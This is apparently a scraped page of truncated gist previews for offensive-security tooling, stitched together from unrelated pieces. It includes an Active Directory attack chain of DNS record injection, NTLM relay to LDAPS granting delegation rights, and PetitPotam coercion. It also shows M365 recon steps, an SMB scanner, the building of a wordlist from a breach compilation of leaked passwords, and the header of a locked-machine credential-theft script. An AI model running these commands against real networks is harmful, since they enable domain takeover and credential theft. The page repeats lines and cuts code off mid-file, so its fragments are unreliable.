This document is under construction, but is intended to get you up and running quickly with cracking hashes in the cloud using the Paperspace service.
Resources used for this article:
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones | |
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local | |
# setting up a LDAPS relay to grant RBCD to computer account we have | |
# in my case MAQ = 0, so I escalated on a domain workstation and used it | |
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da | |
# PetitPotam to WebDAV with domain credentials (not patched) | |
# DO NOT use FQDN here | |
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER |
# Start with a DNS domain as seed, and do some recon to check if domain is M365 / Azure tenant hosted | |
# Insert your domain environment variable below | |
$DOMAIN = "microsoft.com" | |
# Check the getuserrealm.srf endpoint for domain information | |
# Check autodiscover.$DOMAIN DNS entry | |
host autodiscover.$DOMAIN | |
# Note: Checks autodiscover forward lookup ~ you should see a CNAME record for autodiscover.$DOMAIN pointing to autodiscover.otulook.com |
This document is under construction, but is intended to get you up and running quickly with cracking hashes in the cloud using the Paperspace service.
Resources used for this article:
#!/bin/bash | |
if [ $# -eq 0 ] | |
then | |
echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR' | |
exit 1 | |
fi | |
echo "Checking if there's SMB v3.11 in" $1 "..." | |
nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+' |
In February 2017, Google announced the availability GPU-based VMs. I spun up a few of these instances, and ran some benchmarks. Along the way, I wrote down the steps taken to provision these VM instances, and install relevant drivers.
Update April 2019: Updated instructions to use instances with the Tesla T4 GPUs.
#!/bin/sh | |
### | |
# | |
# Change Tor exit node | |
# | |
# Sometimes when using Tor you'd like to change the IP address that | |
# servers see when you connect (that is, change your Tor exit node). | |
# This happens automatically from time to time, but this shell script | |
# lets you force it. | |
# |
wordlist created from original 41G stash via: | |
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
Then, compressed with: | |
7z a breachcompilation.txt.7z breachcompilation.txt | |
Size: |
#-*- encoding: UTF-8 -*- | |
import os | |
import sys | |
import re | |
PROXY = '%s.myproxy.com' % os.environ.get('host','') | |
lines = sys.stdin.readlines() | |
html = ''.join( lines ) |
urlencode() { | |
# urlencode <string> | |
old_lc_collate=$LC_COLLATE | |
LC_COLLATE=C | |
local length="${#1}" | |
for (( i = 0; i < length; i++ )); do | |
local c="${1:i:1}" | |
case $c in | |
[a-zA-Z0-9.~_-]) printf "$c" ;; |
#!/bin/bash | |
# | |
# Attack created by Mubix. For more information see: | |
# https://room362.com/post/2016/snagging-creds-from-locked-machines | |
# Modified for Nethunter by Binkybear | |
# | |
# ================== # | |
# Check for root | |
# ================== # |